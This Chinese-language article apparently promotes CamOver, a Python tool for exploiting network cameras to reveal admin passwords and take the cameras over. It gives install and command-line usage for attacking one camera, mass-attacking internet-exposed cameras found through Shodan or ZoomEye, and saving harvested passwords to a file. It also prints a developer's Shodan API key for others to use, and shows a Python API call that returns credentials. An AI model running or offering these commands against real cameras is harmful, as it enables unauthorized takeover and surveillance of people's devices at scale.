关于CamOverCamOver是一个强大的网络摄像头漏洞利用工具。借助此工具,研究人员可以轻松破解您网络摄像头的管理员密码。并接管您的网络摄像头。功能介绍该工具可以发现和利用大多数主流型号的网络摄像机的安全漏洞,如CCTV、GoAhead和Netwave。优化后支持多线程同时攻击多个摄像头。简单的命令行界面和API用法。工具安装由于CamOver是使用Python3开发的,所以首先需要在本地设备上安装配置Python3环境。接下来,广大研究人员可以使用如下命令下载安装CamOver:pip3installgit+https://github.com/EntySec/CamOverCamOver的基本使用非常简单,我们只需要在命令中输入“camover”命令即可线路终端CamOver可以使用:usage:camover[-h][-t][-oOUTPUT][-iINPUT][-aADDRESS][--shodanSHODAN][--zoomeyeZOOMEYE][-pPAGES]CamOverisacameraexploitationtoolthatallowstodisclosurenetworkcameraadminpassword.optionalarguments:-h,--help显示此帮助消息并退出-t,--threads启用多线程模式以获得更好的性能-oOUTPUT,--outputOUTPUT将结果存储到文件-iINPUT,--inputINPUT地址输入文件-aADDRESS,--addressADDRESS提供单个地址--shodanSHODAN通过网络利用远程设备使用的ShodanAPI密钥--zoomeyeZOOMEYE通过网络利用远程设备使用的ZoomEyeAPI密钥-pPAGES,--pagesPAGES需要通过ZoomEye工具使用获取的页面数例子(1)A攻击单个摄像头以下命令可以攻击单个摄像头:camover-a192.168.99.100(2)通过网络攻击远程摄像头接下来,我们可以使用Shodan搜索引擎搜索并攻击网络上的摄像头。此时我们可以使用-t参数来设置多线程数以获得更好的性能:camover-t--shodanPSKINdQe1GyxGgecYz2191H2JoS9qvgD注意:项目中给出的ShodanAPIkey(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发者自己的专业APIkey,你可以使用你自己的当然,如果你想使用开发者的,你不介意。来共享资源吧!(3)从输入文件中获取目标相机。我们也可以使用开放数据库中提供的摄像头地址。这时候我们可以使用-t参数来设置线程数以获得更好的性能:camover-t-icameras.txt-opasswords.txt注意:此命令将攻击cameras.txt中给出的所有摄像头,并将所有获得的密码存储在passwords.txt文件中。API使用CamOver也提供了自己的PythonAPI,你可以将其导入到你自己的项目代码中并调用它的函数:fromcamoverimportCamOver调用示例攻击单个摄像头:fromcamoverimportCamOvercamover=CamOver()creds=camover.exploit('192.168.99.100')print(creds)项目地址CamOver:[GitHub传送门]
